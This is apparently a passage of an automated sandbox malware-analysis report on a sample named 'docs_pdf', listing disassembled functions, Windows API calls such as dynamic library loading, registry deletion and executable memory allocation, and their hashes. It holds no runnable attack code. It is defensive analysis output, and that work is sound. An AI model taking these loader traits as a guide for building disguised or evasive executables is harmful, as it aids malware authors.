                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 02687ee020c66cc52e48a5d87cf63e1549e1f10c4d2b9ed52477f33217f759eb
                                    • Instruction ID: b8452d88eb1c5653944af342b31842a95dcfd8d024d3f5b824caeb6adccb9808
                                    • Opcode Fuzzy Hash: 02687ee020c66cc52e48a5d87cf63e1549e1f10c4d2b9ed52477f33217f759eb
                                    • Instruction Fuzzy Hash: 8CF03171800B09DBEB715F5AE94C7943FA8B701326F48C314F4AA540E9C73B45A5DF11
                                    Function 00FC2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 00FB7BB1: _memmove.LIBCMT ref: 00FB7C0B
                                    • __swprintf.LIBCMT ref: 00FC302D
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FC2EC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 1943609520-557222456
                                    • Opcode ID: fd8484628b2880313ca159d02c88d7ee22bd4aea78ab0e108b3b8a7530eb218d
                                    • Instruction ID: 97b784d5d6aebd8091766bd12b9b6c03de9db6ce8e8a44a5234c16d9881f8a89
                                    • Opcode Fuzzy Hash: fd8484628b2880313ca159d02c88d7ee22bd4aea78ab0e108b3b8a7530eb218d
                                    • Instruction Fuzzy Hash: 04919D725083069FC714FF24DD86DAEB7A8EF84750F04491DF5429B2A1EA38EE44EB52
                                    Function 0101BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                    • CoInitialize.OLE32(00000000), ref: 0101BC26
                                    • CoCreateInstance.OLE32(01042D6C,00000000,00000001,01042BDC,?), ref: 0101BC3F
                                    • CoUninitialize.OLE32 ref: 0101BC5C
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: 40f4e35fdb3cc577d3b5adff8b81919ce5274a17ce59ca739c3d642bcf1fe4d9
                                    • Instruction ID: 1097950326b601d0d55698acd57f8e26b57566146d00c216c8ae95a9e1f13026
                                    • Opcode Fuzzy Hash: 40f4e35fdb3cc577d3b5adff8b81919ce5274a17ce59ca739c3d642bcf1fe4d9
                                    • Instruction Fuzzy Hash: 7FA133756043019FCB14EF15C884D6ABBF5FF88314F048988F9999B2A2CB39ED45CB92
                                    Function 00FD524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00FD52DD
                                      • Part of subcall function 00FE0340: __87except.LIBCMT ref: 00FE037B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 6556bb8e2e4092db24481b8b8e5cad42ecc5837cbec59caa277a04974c248793
                                    • Instruction ID: a92370bfe3fbef5d7ef7dd582a28a26122e4e104b2ff2b1913cfe085a39ce65d
                                    • Opcode Fuzzy Hash: 6556bb8e2e4092db24481b8b8e5cad42ecc5837cbec59caa277a04974c248793
                                    • Instruction Fuzzy Hash: 0E517B72E0864197DB20B715CA4137E3B929B40B61F284D5AE0D5823D9EFB98CC8BB46
                                    Function 00FD023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #$+
                                    • API String ID: 0-2552117581
                                    • Opcode ID: bbd46a6cfd70ab66b3ab032062414b478035a56bd54173e772c8c2b014e25456
                                    • Instruction ID: 1412fca842c7798d6c8ba8ac2419deee2d7fa4d68fc4f4687769e311ee00cdcc
                                    • Opcode Fuzzy Hash: bbd46a6cfd70ab66b3ab032062414b478035a56bd54173e772c8c2b014e25456
                                    • Instruction Fuzzy Hash: 6B5103355042469FEF26AF28C8887FA7BA5EF59310F184097E9D19B2E0DB349842DF61
                                    Function 00FC62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$_memmove
                                    • String ID: ERCP
                                    • API String ID: 2532777613-1384759551
                                    • Opcode ID: 9804956ea06e224944a8ff21e523b1f8805bb201f1ef6e9dee737c7d8d937983
                                    • Instruction ID: 60553a99978fa7553b3d579140396c7a95d41cfbe6c3452762c6400fc0649133
                                    • Opcode Fuzzy Hash: 9804956ea06e224944a8ff21e523b1f8805bb201f1ef6e9dee737c7d8d937983
                                    • Instruction Fuzzy Hash: C051A17190470ADBDB28CF65C986BAABBF9EF04314F10856EE58AC7281E731D584DB40
                                    Function 01037BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0103F910,00000000,?,?,?,?), ref: 01037C4E
                                    • GetWindowLongW.USER32 ref: 01037C6B
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01037C7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 92a0a6f1da8657b6e62bdcc184d717fba486bb9d839646dbdeab694a2238aa4f
                                    • Instruction ID: 92fd0ed115ec02993225b6a943562458fc4f91d0534b3ee5756b68e49b624c3a
                                    • Opcode Fuzzy Hash: 92a0a6f1da8657b6e62bdcc184d717fba486bb9d839646dbdeab694a2238aa4f
                                    • Instruction Fuzzy Hash: FC31D27161020AAFDB618E38DC41BDA7BEDFB85324F244729F9B5931E0D735E8509B50
                                    Function 01037648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010376D0
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010376E4
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01037708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: cb6a52547966e5727eae70c80e815eb11df19477545414a101e22dc789e79d32
                                    • Instruction ID: 6b4e19c7bb824a27c26fcfdfa3e4a28593381972b119aeaf59085fa1f1fe2381
                                    • Opcode Fuzzy Hash: cb6a52547966e5727eae70c80e815eb11df19477545414a101e22dc789e79d32
                                    • Instruction Fuzzy Hash: 9921D372500219BBDF22CE64CC45FEA3BA9FF8C714F110254FE956B1D1D6B5A850DBA0
                                    Function 01036F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01036FAA
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01036FBA
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01036FDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: e9dbf0f6237d980ae0a675f3ec8467f0afd922bd0fae682b9657c6362efc10c2
                                    • Instruction ID: 662b3b464bcc9c40df82d01e5ce4607e4903fed4b1f040ffe03dde3558b78ef1
                                    • Opcode Fuzzy Hash: e9dbf0f6237d980ae0a675f3ec8467f0afd922bd0fae682b9657c6362efc10c2
                                    • Instruction Fuzzy Hash: 4021C5326101187FDF128F58CC84FAB3BAEEFC9754F418164F9849B191CA729C51CBA0
                                    Function 0103797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010379E1
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010379F6
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01037A03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 8c85575bcede69a1f7fbe43d49f919399a92607e698291707b63dd61099b3d7e
                                    • Instruction ID: d8bcc1f4ac6fb07b2b34052a262a9048fb87ebcaa3355a2b134c699ecb098822
                                    • Opcode Fuzzy Hash: 8c85575bcede69a1f7fbe43d49f919399a92607e698291707b63dd61099b3d7e
                                    • Instruction Fuzzy Hash: A411E3B2640208BAEF219E75CC05FEB7BADEFC9764F010619FA81A6091D272D411DB60
                                    Function 00FB4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FB4C2E), ref: 00FB4CA3
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FB4CB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: c897fa85a009de81fad3150b0474216441bcdfccb53c6e3b0356715b8fb47d77
                                    • Instruction ID: b438dc0903090401ed0c5c951ae88887e4154538914dc013ac8bd55046b6914b
                                    • Opcode Fuzzy Hash: c897fa85a009de81fad3150b0474216441bcdfccb53c6e3b0356715b8fb47d77
                                    • Instruction Fuzzy Hash: 51D012B4D11727DFD7205F32DA1864676D9AF06A51B11882DD8C5D6510D774D880CB51
                                    Function 00FB4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FB4CE1,?), ref: 00FB4DA2
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4DB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 3d4364fb88a9842bc0fe1fc75e351c0e9fa56470d3054450edd1d6e912673cfb
                                    • Instruction ID: ab10c25b3819e617b335375aa10dc58ca6270daed0b78e2e6b31e024d0fb2dfc
                                    • Opcode Fuzzy Hash: 3d4364fb88a9842bc0fe1fc75e351c0e9fa56470d3054450edd1d6e912673cfb
                                    • Instruction Fuzzy Hash: 18D01275D50713CFD7305F32D518A8676D8AF0A255B11882DD8D5D6510D774D880CB51
                                    Function 00FB4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FB4D2E,?,00FB4F4F,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4D6F
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB4D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: a4fc7f6e0803cfc0a7a0617353289db2b883a00e0f5ca5cdb3e47c05d9355c4a
                                    • Instruction ID: 6f7305ced58d22cbb743c64d3079c325383b59e1abb8f1cee5cee63f8b27235e
                                    • Opcode Fuzzy Hash: a4fc7f6e0803cfc0a7a0617353289db2b883a00e0f5ca5cdb3e47c05d9355c4a
                                    • Instruction Fuzzy Hash: 4BD01770D10713CFDB309F32E91865676ECAF1A262B11892EA4C6DA210E7B5E880CF61
                                    Function 01031072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,010312C1), ref: 01031080
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01031092
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: 51dfce8998aafd4bccbca0cb96832daae808509f4b580c244d7dbc3677ece218
                                    • Instruction ID: de4ce96b980ada73d3ff550442789bba9b3e41eb20f7458a1d74ac51f6121126
                                    • Opcode Fuzzy Hash: 51dfce8998aafd4bccbca0cb96832daae808509f4b580c244d7dbc3677ece218
                                    • Instruction Fuzzy Hash: 5FD01270A107138FD7305F35D418517B6ECAF4A251B118C6DA4C5DA110D7B4C480C751
                                    Function 010293F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01029009,?,0103F910), ref: 01029403
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01029415
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: bb2c98704a79b2e2161f7484c674db8dcf217529c1ce570df4a3202200c2cfa3
                                    • Instruction ID: 11b84c8a4376bc3c1ee13a4e0be8a6776333d5e8a22f2b6269e2d1d57d64393b
                                    • Opcode Fuzzy Hash: bb2c98704a79b2e2161f7484c674db8dcf217529c1ce570df4a3202200c2cfa3
                                    • Instruction Fuzzy Hash: 4ED01774A10727CFDB209F36E918A0776E9AF06255F11C87EE4CADA514EBB4D4C0CB51
                                    Function 010076C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d04d7eedd4a1560146ecad642ef615050f4085ce0a85eeb1d45256b918774477
                                    • Instruction ID: 2cf5d92631d96653318945c993f3ce04940bfb99227477000c4a0226643a15ab
                                    • Opcode Fuzzy Hash: d04d7eedd4a1560146ecad642ef615050f4085ce0a85eeb1d45256b918774477
                                    • Instruction Fuzzy Hash: 6FC17074A00206EFEB15CF98C8849AEBBF5FF48310F114598E985EB291D735EE81CB90
                                    Function 0102E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 0102E3D2
                                    • CharLowerBuffW.USER32(?,?), ref: 0102E415
                                      • Part of subcall function 0102DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0102DAD9
                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0102E615
                                    • _memmove.LIBCMT ref: 0102E628
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                    • String ID:
                                    • API String ID: 3659485706-0
                                    • Opcode ID: 287a6fe858e547e9a2e046fb3cd76f367a296e1bbdd6078ef55ec0d02a4a678f
                                    • Instruction ID: aaa9c6f21b01976c00a3bd7dfad869bd72a9d39ae6b4a4553b373e60ae5f5ba5
